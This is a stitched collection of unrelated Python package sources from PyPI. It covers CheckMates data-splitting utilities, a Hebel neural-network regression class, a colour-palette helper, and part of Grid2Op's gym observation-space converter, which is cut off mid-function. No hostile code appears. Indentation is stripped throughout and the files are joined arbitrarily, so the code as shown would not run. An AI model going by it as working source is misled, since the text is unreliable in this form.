.. _`type coercion`: http://docs.python-cerberus.org/en/latest/usage.html#type-coercion
| PypiClean |
/CheckMates-0.2.0-py3-none-any.whl/checkmates/pipelines/utils.py | from typing import Union
import numpy as np
import pandas as pd
from sklearn.model_selection import ShuffleSplit, StratifiedShuffleSplit
from checkmates.data_checks import DataCheckActionCode
from checkmates.pipelines.components import ( # noqa: F401
DropColumns,
DropRowsTransformer,
PerColumnImputer,
TargetImputer,
TimeSeriesImputer,
TimeSeriesRegularizer,
)
from checkmates.pipelines.training_validation_split import TrainingValidationSplit
from checkmates.problem_types import is_classification, is_regression, is_time_series
from checkmates.utils import infer_feature_types
def _make_component_list_from_actions(actions):
"""Creates a list of components from the input DataCheckAction list.
Args:
actions (list(DataCheckAction)): List of DataCheckAction objects used to create list of components
Returns:
list(ComponentBase): List of components used to address the input actions
"""
components = []
cols_to_drop = []
indices_to_drop = []
for action in actions:
if action.action_code == DataCheckActionCode.REGULARIZE_AND_IMPUTE_DATASET:
metadata = action.metadata
parameters = metadata.get("parameters", {})
components.extend(
[
TimeSeriesRegularizer(
time_index=parameters.get("time_index", None),
frequency_payload=parameters["frequency_payload"],
),
TimeSeriesImputer(),
],
)
elif action.action_code == DataCheckActionCode.DROP_COL:
cols_to_drop.extend(action.metadata["columns"])
elif action.action_code == DataCheckActionCode.IMPUTE_COL:
metadata = action.metadata
parameters = metadata.get("parameters", {})
if metadata["is_target"]:
components.append(
TargetImputer(impute_strategy=parameters["impute_strategy"]),
)
else:
impute_strategies = parameters["impute_strategies"]
components.append(PerColumnImputer(impute_strategies=impute_strategies))
elif action.action_code == DataCheckActionCode.DROP_ROWS:
indices_to_drop.extend(action.metadata["rows"])
if cols_to_drop:
cols_to_drop = sorted(set(cols_to_drop))
components.append(DropColumns(columns=cols_to_drop))
if indices_to_drop:
indices_to_drop = sorted(set(indices_to_drop))
components.append(DropRowsTransformer(indices_to_drop=indices_to_drop))
return components
def split_data(
X,
y,
problem_type,
problem_configuration=None,
test_size=None,
random_seed=0,
):
"""Split data into train and test sets.
Args:
X (pd.DataFrame or np.ndarray): data of shape [n_samples, n_features]
y (pd.Series, or np.ndarray): target data of length [n_samples]
problem_type (str or ProblemTypes): type of supervised learning problem. see evalml.problem_types.problemtype.all_problem_types for a full list.
problem_configuration (dict): Additional parameters needed to configure the search. For example,
in time series problems, values should be passed in for the time_index, gap, and max_delay variables.
test_size (float): What percentage of data points should be included in the test set. Defaults to 0.2 (20%) for non-timeseries problems and 0.1
(10%) for timeseries problems.
random_seed (int): Seed for the random number generator. Defaults to 0.
Returns:
pd.DataFrame, pd.DataFrame, pd.Series, pd.Series: Feature and target data each split into train and test sets.
Examples:
>>> X = pd.DataFrame([1, 2, 3, 4, 5, 6], columns=["First"])
>>> y = pd.Series([8, 9, 10, 11, 12, 13])
...
>>> X_train, X_validation, y_train, y_validation = split_data(X, y, "regression", random_seed=42)
>>> X_train
First
5 6
2 3
4 5
3 4
>>> X_validation
First
0 1
1 2
>>> y_train
5 13
2 10
4 12
3 11
dtype: int64
>>> y_validation
0 8
1 9
dtype: int64
"""
X = infer_feature_types(X)
y = infer_feature_types(y)
data_splitter = None
if is_time_series(problem_type):
if test_size is None:
test_size = 0.1
if (
problem_configuration is not None
and "forecast_horizon" in problem_configuration
):
fh_pct = problem_configuration["forecast_horizon"] / len(X)
test_size = max(test_size, fh_pct)
data_splitter = TrainingValidationSplit(
test_size=test_size,
shuffle=False,
stratify=None,
random_seed=random_seed,
)
else:
if test_size is None:
test_size = 0.2
if is_regression(problem_type):
data_splitter = ShuffleSplit(
n_splits=1,
test_size=test_size,
random_state=random_seed,
)
elif is_classification(problem_type):
data_splitter = StratifiedShuffleSplit(
n_splits=1,
test_size=test_size,
random_state=random_seed,
)
train, test = next(data_splitter.split(X, y))
X_train = X.ww.iloc[train]
X_test = X.ww.iloc[test]
y_train = y.ww.iloc[train]
y_test = y.ww.iloc[test]
return X_train, X_test, y_train, y_test
def drop_infinity(
data: Union[pd.DataFrame, pd.Series],
) -> Union[pd.DataFrame, pd.Series]:
"""Removes infinity values."""
ww = data.ww._schema is not None
replace = data.ww.replace if ww else data.replace
return replace([np.inf, -np.inf], np.nan) | PypiClean |
/Hebel-0.02.1.tar.gz/Hebel-0.02.1/hebel/models/neural_net_regression.py |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from .neural_net import NeuralNet
from ..layers import LinearRegressionLayer
class NeuralNetRegression(NeuralNet):
"""A neural network for regression using the squared error loss
function.
This class exists for convenience. The same results can be
achieved by creating a :class:`hebel.models.NeuralNet` instance
and passing a :class:`hebel.layers.LinearRegressionLayer` instance
as the ``top_layer`` argument.
**Parameters:**
layers : array_like
An array of either integers or instances of
:class:`hebel.models.HiddenLayer` objects. If integers are
given, they represent the number of hidden units in each layer
and new ``HiddenLayer`` objects will be created. If
``HiddenLayer`` instances are given, the user must make sure
that each ``HiddenLayer`` has ``n_in`` set to the preceding
layer's ``n_units``. If ``HiddenLayer`` instances are passed,
then ``activation_function``, ``dropout``, ``n_in``,
``l1_penalty_weight``, and ``l2_penalty_weight`` are ignored.
top_layer : :class:`hebel.models.TopLayer` instance, optional
If ``top_layer`` is given, then it is used for the output
layer, otherwise, a ``LinearRegressionLayer`` instance is created.
activation_function : {'sigmoid', 'tanh', 'relu', or 'linear'}, optional
The activation function to be used in the hidden layers.
dropout : bool, optional
Whether to use dropout regularization
n_in : integer, optional
The dimensionality of the input. Must be given, if the first
hidden layer is not passed as a
:class:`hebel.models.HiddenLayer` instance.
n_out : integer, optional
The number of classes to predict from. Must be given, if a
:class:`hebel.models.HiddenLayer` instance is not given in
``top_layer``.
l1_penalty_weight : float, optional
Weight for L1 regularization
l2_penalty_weight : float, optional
Weight for L2 regularization
kwargs : optional
Any additional arguments are passed on to ``top_layer``
**See also:**
:class:`hebel.models.NeuralNet`,
:class:`hebel.models.MultitaskNeuralNet`,
:class:`hebel.layers.LinearRegressionLayer`
"""
TopLayerClass = LinearRegressionLayer | PypiClean |
/ColorfulData-1.0.2-py3-none-any.whl/ColorfulData_Package/ColorfulData.py | import numpy as np
from math import ceil,floor
class ColorfulData:
"""
Create custom evenly distributed color palete
\n`Get_Colors_Matched`: key,value relationship evenly distributed for given unique values
\n`Get_Colors`: Evenly distributed for given length
"""
@staticmethod
def Get_Colors_Matched(items:list([any]),colorPalette:dict[int,any])->np.array:
"""
Returns 2d ndarray of unique `items` for given `colorPalette`
\nIf `colorPalette` is larger then unique `items`: \n\treturned values are equaly spaced from start to end of `colorPalette`
\n\nIf `colorPalette` is smaller then unique `items`: \n\t`colorPalette` is expanded by repeating colors, in given order, then equaly spaced from start to end
"""
_items = np.unique(np.array(items))
_itemcount = len(_items)
_ret = ColorfulData.Get_Colors(_itemcount,colorPalette=colorPalette)
_ret = np.column_stack(
[np.array(_items),
_ret])
return _ret
@staticmethod
def Get_Colors(count:int,colorPalette:dict[int,any])->np.array:
"""
Returns ndarray of given `count` for given `colorPalette`
\nIf `colorPalette` is larger then `count`: \n\treturned values are equaly spaced from start to end of `colorPalette`
\n\nIf `colorPalette` is smaller then `count`: \n\t`colorPalette` is expanded by repeating colors, in given order, then equaly spaced from start to end
"""
_paletteCount = len(colorPalette)
_colorsCount = count
_repeat = ceil(_colorsCount/_paletteCount)
_colorsIn = np.repeat(np.array(colorPalette),_repeat)
_remainder = len(_colorsIn)-_colorsCount
_colorIndex = _colorsIn
_skip = floor(_remainder/_colorsCount)
_index = np.arange(start=0,stop=_paletteCount,step= _skip if _skip>1 else 1)
if _skip > 0:
_colorIndex = \
[_colorsIn[x] for x in (_index)][:_colorsCount]
print('')
else:
_colorIndex = \
_colorsIn[:_colorsCount]
#print(f'{str(_colorsCount).rjust(5)}:'
#+f' x{_repeat}'
#+f' new palette: {str(len(_colorsIn)).rjust(5)}'
#+f' remainder: {str(_remainder).rjust(5)}'
#+f' skip:{str(_skip).rjust(3)}'
#+f' color index:{str(len(_colorIndex)).rjust(5)}')
return _colorIndex | PypiClean |
/Grid2Op-1.9.3-py3-none-any.whl/grid2op/gym_compat/box_gym_obsspace.py |
from typing import Tuple
import copy
import warnings
import numpy as np
from grid2op.dtypes import dt_int, dt_bool, dt_float
from grid2op.Observation import ObservationSpace
from grid2op.Exceptions import Grid2OpException
from grid2op.gym_compat.utils import (_compute_extra_power_for_losses,
GYM_AVAILABLE,
GYMNASIUM_AVAILABLE,
check_gym_version)
ALL_ATTR_OBS = (
"year",
"month",
"day",
"hour_of_day",
"minute_of_hour",
"day_of_week",
"gen_p",
"gen_p_before_curtail",
"gen_q",
"gen_v",
"gen_margin_up",
"gen_margin_down",
"load_p",
"load_q",
"load_v",
"p_or",
"q_or",
"v_or",
"a_or",
"p_ex",
"q_ex",
"v_ex",
"a_ex",
"rho",
"line_status",
"timestep_overflow",
"topo_vect",
"time_before_cooldown_line",
"time_before_cooldown_sub",
"time_next_maintenance",
"duration_next_maintenance",
"target_dispatch",
"actual_dispatch",
"storage_charge",
"storage_power_target",
"storage_power",
"curtailment",
"curtailment_limit",
"curtailment_limit_effective",
"thermal_limit",
"is_alarm_illegal",
"time_since_last_alarm",
"last_alarm",
"attention_budget",
"was_alarm_used_after_game_over",
"max_step",
"active_alert",
"attack_under_alert",
"time_since_last_alert",
"alert_duration",
"total_number_of_alert",
"time_since_last_attack",
"was_alert_used_after_attack",
"theta_or",
"theta_ex",
"load_theta",
"gen_theta",
)
# TODO add the alarm stuff
# TODO add the time step
# TODO add the is_illegal and co there
class __AuxBoxGymObsSpace:
"""
This class allows to convert a grid2op observation space into a gym "Box" which is
a regular Box in R^d.
It also allows to customize which part of the observation you want to use and offer capacity to
center / reduce the data or to use more complex function from the observation.
.. warning::
Depending on the presence absence of gymnasium and gym packages this class might behave differently.
In grid2op we tried to maintain compatibility both with gymnasium (newest) and gym (legacy,
no more maintained) RL packages. The behaviour is the following:
- :class:`BoxGymObsSpace` will inherit from gymnasium if it's installed
(in this case it will be :class:`BoxGymnasiumObsSpace`), otherwise it will
inherit from gym (and will be exactly :class:`BoxLegacyGymObsSpace`)
- :class:`BoxGymnasiumObsSpace` will inherit from gymnasium if it's available and never from
from gym
- :class:`BoxLegacyGymObsSpace` will inherit from gym if it's available and never from
from gymnasium
See :ref:`gymnasium_gym` for more information
.. note::
A gymnasium Box is encoded as a numpy array.
Examples
--------
If you simply want to use it you can do:
.. code-block:: python
import grid2op
env_name = "l2rpn_case14_sandbox" # or any other name
env = grid2op.make(env_name)
from grid2op.gym_compat import GymEnv, BoxGymObsSpace
gym_env = GymEnv(env)
gym_env.observation_space = BoxGymObsSpace(env.observation_space)
In this case it will extract all the features in all the observation (a detailed list is given
in the documentation at :ref:`observation_module`.
You can select the attribute you want to keep, for example:
.. code-block:: python
gym_env.observation_space = BoxGymObsSpace(env.observation_space,
attr_to_keep=['load_p', "gen_p", "rho])
You can also apply some basic transformation to the attribute of the observation before building
the resulting gym observation (which in this case is a vector). This can be done with:
.. code-block:: python
gym_env.observation_space = BoxGymObsSpace(env.observation_space,
attr_to_keep=['load_p', "gen_p", "rho"],
divide={"gen_p": env.gen_pmax},
substract={"gen_p": 0.5 * env.gen_pmax})
In the above example, the resulting "gen_p" part of the vector will be given by the following
formula: `gym_obs = (grid2op_obs - substract) / divide`.
Hint: you can use: divide being the standard deviation and subtract being the average of the attribute
on a few episodes for example. This can be done with :class:`grid2op.utils.EpisodeStatistics` for example.
Finally, you can also modify more the attribute of the observation and add it to your box. This
can be done rather easily with the "functs" argument like:
.. code-block:: python
gym_env.observation_space = BoxGymObsSpace(env.observation_space,
attr_to_keep=["connectivity_matrix", "log_load"],
functs={"connectivity_matrix":
(lambda grid2opobs: grid2opobs.connectivity_matrix().flatten(),
0., 1.0, None, None),
"log_load":
(lambda grid2opobs: np.log(grid2opobs.load_p),
None, 10., None, None)
}
)
In this case, "functs" should be a dictionary, the "keys" should be string (keys should also be
present in the `attr_to_keep` list) and the values should count 5 elements
(callable, low, high, shape, dtype) with:
- `callable` a function taking as input a grid2op observation and returning a numpy array
- `low` (optional) (put None if you don't want to specify it, defaults to `-np.inf`) the lowest value
your numpy array can take. It can be a single number or an array with the same shape
as the return value of your function.
- `high` (optional) (put None if you don't want to specify it, defaults to `np.inf`) the highest value
your numpy array can take. It can be a single number or an array with the same shape
as the return value of your function.
- `shape` (optional) (put None if you don't want to specify it) the shape of the return value
of your function. It should be a tuple (and not a single number). By default it is computed
with by applying your function to an observation.
- `dtype` (optional, put None if you don't want to change it, defaults to np.float32) the type of
the numpy array as output of your function.
Notes
-----
The range of the values for "gen_p" / "prod_p" are not strictly `env.gen_pmin` and `env.gen_pmax`.
This is due to the "approximation" when some redispatching is performed (the precision of the
algorithm that computes the actual dispatch from the information it receives) and also because
sometimes the losses of the grid are really different that the one anticipated in the "chronics" (yes
env.gen_pmin and env.gen_pmax are not always ensured in grid2op)
"""
def __init__(
self,
grid2op_observation_space,
attr_to_keep=ALL_ATTR_OBS,
subtract=None,
divide=None,
functs=None,
):
check_gym_version(type(self)._gymnasium)
if not isinstance(grid2op_observation_space, ObservationSpace):
raise RuntimeError(
f"Impossible to create a BoxGymObsSpace without providing a "
f"grid2op observation. You provided {type(grid2op_observation_space)}"
f'as the "grid2op_observation_space" attribute.'
)
self._attr_to_keep = sorted(attr_to_keep)
ob_sp = grid2op_observation_space
tol_redisp = (
ob_sp.obs_env._tol_poly
) # add to gen_p otherwise ... well it can crash
extra_for_losses = _compute_extra_power_for_losses(ob_sp)
self._dict_properties = {
"year": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + 2200,
(1,),
dt_int,
),
"month": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + 12,
(1,),
dt_int,
),
"day": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + 31,
(1,),
dt_int,
),
"hour_of_day": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + 24,
(1,),
dt_int,
),
"minute_of_hour": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + 60,
(1,),
dt_int,
),
"day_of_week": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + 7,
(1,),
dt_int,
),
"current_step": (
np.zeros(1, dtype=dt_int),
np.zeros(1, dtype=dt_int) + np.iinfo(dt_int).max,
(1,),
dt_int,
),
"gen_p": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float)
- tol_redisp
- extra_for_losses,
ob_sp.gen_pmax + tol_redisp + extra_for_losses,
(ob_sp.n_gen,),
dt_float,
),
"gen_q": (
np.full(shape=(ob_sp.n_gen,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_gen,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_gen,),
dt_float,
),
"gen_v": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_gen,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_gen,),
dt_float,
),
"gen_margin_up": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
1.0 * ob_sp.gen_max_ramp_up,
(ob_sp.n_gen,),
dt_float,
),
"gen_margin_down": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
1.0 * ob_sp.gen_max_ramp_down,
(ob_sp.n_gen,),
dt_float,
),
"gen_theta": (
np.full(shape=(ob_sp.n_gen,), fill_value=-180., dtype=dt_float),
np.full(shape=(ob_sp.n_gen,), fill_value=180., dtype=dt_float),
(ob_sp.n_gen,),
dt_float,
),
"load_p": (
np.full(shape=(ob_sp.n_load,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_load,), fill_value=+np.inf, dtype=dt_float),
(ob_sp.n_load,),
dt_float,
),
"load_q": (
np.full(shape=(ob_sp.n_load,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_load,), fill_value=+np.inf, dtype=dt_float),
(ob_sp.n_load,),
dt_float,
),
"load_v": (
np.full(shape=(ob_sp.n_load,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_load,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_load,),
dt_float,
),
"load_theta": (
np.full(shape=(ob_sp.n_load,), fill_value=-180., dtype=dt_float),
np.full(shape=(ob_sp.n_load,), fill_value=180., dtype=dt_float),
(ob_sp.n_load,),
dt_float,
),
"p_or": (
np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"q_or": (
np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"a_or": (
np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"v_or": (
np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"theta_or": (
np.full(shape=(ob_sp.n_line,), fill_value=-180., dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=180., dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"p_ex": (
np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"q_ex": (
np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"a_ex": (
np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"v_ex": (
np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"theta_ex": (
np.full(shape=(ob_sp.n_line,), fill_value=-180., dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=180., dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"rho": (
np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"line_status": (
np.full(shape=(ob_sp.n_line,), fill_value=0, dtype=dt_int),
np.full(shape=(ob_sp.n_line,), fill_value=1, dtype=dt_int),
(ob_sp.n_line,),
dt_int,
),
"timestep_overflow": (
np.full(
shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).min, dtype=dt_int
),
np.full(
shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
),
(ob_sp.n_line,),
dt_int,
),
"topo_vect": (
np.full(shape=(ob_sp.dim_topo,), fill_value=-1, dtype=dt_int),
np.full(shape=(ob_sp.dim_topo,), fill_value=2, dtype=dt_int),
(ob_sp.dim_topo,),
dt_int,
),
"time_before_cooldown_line": (
np.full(shape=(ob_sp.n_line,), fill_value=0, dtype=dt_int),
np.full(
shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
),
(ob_sp.n_line,),
dt_int,
),
"time_before_cooldown_sub": (
np.full(shape=(ob_sp.n_sub,), fill_value=0, dtype=dt_int),
np.full(
shape=(ob_sp.n_sub,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
),
(ob_sp.n_sub,),
dt_int,
),
"time_next_maintenance": (
np.full(shape=(ob_sp.n_line,), fill_value=-1, dtype=dt_int),
np.full(
shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
),
(ob_sp.n_line,),
dt_int,
),
"duration_next_maintenance": (
np.full(shape=(ob_sp.n_line,), fill_value=0, dtype=dt_int),
np.full(
shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
),
(ob_sp.n_line,),
dt_int,
),
"target_dispatch": (
np.minimum(ob_sp.gen_pmin, -ob_sp.gen_pmax),
np.maximum(-ob_sp.gen_pmin, +ob_sp.gen_pmax),
(ob_sp.n_gen,),
dt_float,
),
"actual_dispatch": (
np.minimum(ob_sp.gen_pmin, -ob_sp.gen_pmax),
np.maximum(-ob_sp.gen_pmin, +ob_sp.gen_pmax),
(ob_sp.n_gen,),
dt_float,
),
"storage_charge": (
np.full(shape=(ob_sp.n_storage,), fill_value=0, dtype=dt_float),
1.0 * ob_sp.storage_Emax,
(ob_sp.n_storage,),
dt_float,
),
"storage_power_target": (
-1.0 * ob_sp.storage_max_p_prod,
1.0 * ob_sp.storage_max_p_absorb,
(ob_sp.n_storage,),
dt_float,
),
"storage_power": (
-1.0 * ob_sp.storage_max_p_prod,
1.0 * ob_sp.storage_max_p_absorb,
(ob_sp.n_storage,),
dt_float,
),
"storage_theta": (
np.full(shape=(ob_sp.n_storage,), fill_value=-180., dtype=dt_float),
np.full(shape=(ob_sp.n_storage,), fill_value=180., dtype=dt_float),
(ob_sp.n_storage,),
dt_float,
),
"curtailment": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_gen,), fill_value=1.0, dtype=dt_float),
(ob_sp.n_gen,),
dt_float,
),
"curtailment_limit": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_gen,), fill_value=1.0, dtype=dt_float),
(ob_sp.n_gen,),
dt_float,
),
"curtailment_mw": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
1.0 * ob_sp.gen_pmax,
(ob_sp.n_gen,),
dt_float,
),
"curtailment_limit_mw": (
np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
1.0 * ob_sp.gen_pmax,
(ob_sp.n_gen,),
dt_float,
),
"thermal_limit": (
np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
(ob_sp.n_line,),
dt_float,
),
"is_alarm_illegal": (
np.full(shape=(1,), fill_value=False, dtype=dt_bool),
np.full(shape=(1,), fill_value=True, dtype=dt_bool),
(1,),
dt_bool,
),
"time_since_last_alarm": (
np.full(shape=(1,), fill_value=-1, dtype=dt_int),
np.full(shape=(1,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
(1,),
dt_int,
),
"last_alarm": (
np.full(shape=(ob_sp.dim_alarms,), fill_value=-1, dtype=dt_int),
np.full(
shape=(ob_sp.dim_alarms,),
fill_value=np.iinfo(dt_int).max,
dtype=dt_int,
),
(ob_sp.dim_alarms,),
dt_int,
),
"attention_budget": (
np.full(shape=(1,), fill_value=-1, dtype=dt_float),
np.full(shape=(1,), fill_value=np.inf, dtype=dt_float),
(1,),
dt_float,
),
"was_alarm_used_after_game_over": (
np.full(shape=(1,), fill_value=False, dtype=dt_bool),
np.full(shape=(1,), fill_value=True, dtype=dt_bool),
(1,),
dt_bool,
),
"delta_time": (
np.full(shape=(1,), fill_value=0, dtype=dt_float),
np.full(shape=(1,), fill_value=np.inf, dtype=dt_float),
(1,),
dt_float,
),
# alert stuff
"active_alert": (
np.full(shape=(ob_sp.dim_alerts,), fill_value=False, dtype=dt_bool),
np.full(shape=(ob_sp.dim_alerts,), fill_value=True, dtype=dt_bool),
(ob_sp.dim_alerts,),
dt_bool,
),
"time_since_last_alert": (
np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
np.full(shape=(ob_sp.dim_alerts,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
(ob_sp.dim_alerts,),
dt_int,
),
"alert_duration": (
np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
np.full(shape=(ob_sp.dim_alerts,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
(ob_sp.dim_alerts,),
dt_int,
),
"total_number_of_alert": (
np.full(shape=(1 if ob_sp.dim_alerts else 0,), fill_value=-1, dtype=dt_int),
np.full(shape=(1 if ob_sp.dim_alerts else 0,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
(1 if ob_sp.dim_alerts else 0,),
dt_int,
),
"time_since_last_attack": (
np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
np.full(shape=(ob_sp.dim_alerts,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
(ob_sp.dim_alerts,),
dt_int,
),
"was_alert_used_after_attack": (
np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
np.full(shape=(ob_sp.dim_alerts,), fill_value=1, dtype=dt_int),
(ob_sp.dim_alerts,),
dt_int,
),
"attack_under_alert": (
np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
np.full(shape=(ob_sp.dim_alerts,), fill_value=1, dtype=dt_int),
(ob_sp.dim_alerts,),
dt_int,
),
}
self._dict_properties["max_step"] = copy.deepcopy(self._dict_properties["current_step"])
self._dict_properties["delta_time"] = copy.deepcopy(self._dict_properties["current_step"])
self._dict_properties["prod_p"] = copy.deepcopy(self._dict_properties["gen_p"])
self._dict_properties["prod_q"] = copy.deepcopy(self._dict_properties["gen_q"])
self._dict_properties["prod_v"] = copy.deepcopy(self._dict_properties["gen_v"])
self._dict_properties["gen_p_before_curtail"] = copy.deepcopy(self._dict_properties["gen_p"])
self._dict_properties["curtailment_limit_effective"] = copy.deepcopy(self._dict_properties[
"curtailment_limit"
])
if functs is None:
functs = {}
for key in functs.keys():
if key not in self._attr_to_keep:
raise RuntimeError(
f'The key {key} is present in the "functs" dictionary but not in the '
f'"attr_to_keep". This is not consistent: either ignore this function, '
f'in that case remove "{key}" from "functs" or you want to add '
f'something to your observation, in that case add it to "attr_to_keep"'
)
if subtract is None:
subtract = {}
self._subtract = subtract
if divide is None:
divide = {}
self._divide = divide
# handle the "functional" part
self._template_obs = ob_sp._template_obj.copy()
self.__func = {}
self._dims = None
low, high, shape, dtype = self._get_info(functs)
# initialize the base container
type(self)._BoxType.__init__(self, low=low, high=high, shape=shape, dtype=dtype)
# convert data in `_subtract` and `_divide` to the right type
self._fix_value_sub_div(self._subtract, functs)
self._fix_value_sub_div(self._divide, functs)
def _get_shape(self, el, functs):
if el in functs:
callable_, low_, high_, shape_, dtype_ = functs[el]
elif el in self._dict_properties:
# el is an attribute of an observation, for example "load_q" or "topo_vect"
low_, high_, shape_, dtype_ = self._dict_properties[el]
return shape_
def _fix_value_sub_div(self, dict_, functs):
"""dict_ is either self._subtract or self._divide"""
keys = list(dict_.keys())
for k in keys:
v = dict_[k]
if isinstance(v, (list, tuple)):
v = np.array(v).astype(self.dtype)
else:
shape = self._get_shape(k, functs)
v = np.full(shape, fill_value=v, dtype=self.dtype)
dict_[k] = v
def _get_info(self, functs):
low = None
high = None
shape = None
dtype = None
self._dims = []
for el in self._attr_to_keep:
if el in functs:
# the attribute name "el" has been put in the functs
try:
callable_, low_, high_, shape_, dtype_ = functs[el]
except Exception as exc_:
raise RuntimeError(
f'When using keyword argument "functs" you need to provide something '
f"like: (callable_, low_, high_, shape_, dtype_) for each key. "
f'There was an error with "{el}".'
f"The error was:\n {exc_}"
)
try:
tmp = callable_(self._template_obs.copy())
except Exception as exc_:
raise RuntimeError(
f'Error for the function your provided with key "{el}" (using the'
f'"functs" dictionary) '
f"The error was :\n {exc_}"
)
if not isinstance(tmp, np.ndarray):
raise RuntimeError(
f'The result of the function you provided as part of the "functs"'
f"dictionary for key {el}"
f"do not return a numpy array. This is not supported."
)
self.__func[el] = callable_
if dtype_ is None:
dtype_ = dt_float
if shape_ is None:
shape_ = tmp.shape
if not isinstance(shape_, tuple):
raise RuntimeError(
"You need to provide a tuple as a shape of the output of your data"
)
if low_ is None:
low_ = np.full(shape_, fill_value=-np.inf, dtype=dtype_)
elif isinstance(low_, float):
low_ = np.full(shape_, fill_value=low_, dtype=dtype_)
if high_ is None:
high_ = np.full(shape_, fill_value=np.inf, dtype=dtype_)
elif isinstance(high_, float):
high_ = np.full(shape_, fill_value=high_, dtype=dtype_)
if ((tmp < low_) | (tmp > high_)).any():
raise RuntimeError(
f"Wrong value for low / high in the functs argument for key {el}. Please"
f"fix the low_ / high_ in the tuple ( callable_, low_, high_, shape_, dtype_)."
)
elif el in self._dict_properties:
# el is an attribute of an observation, for example "load_q" or "topo_vect"
low_, high_, shape_, dtype_ = self._dict_properties[el]
else:
li_keys = "\n\t-".join(
sorted(list(self._dict_properties.keys()) + list(self.__func.keys()))
)
raise RuntimeError(
f'Unknown observation attributes "{el}". Supported attributes are: '
f"\n{li_keys}"
)
# handle the data type
if dtype is None:
dtype = dtype_
else:
if dtype_ == dt_float:
# promote whatever to float anyway
dtype = dt_float
elif dtype_ == dt_int and dtype == dt_bool:
# promote bool to int
dtype = dt_int
# handle the shape
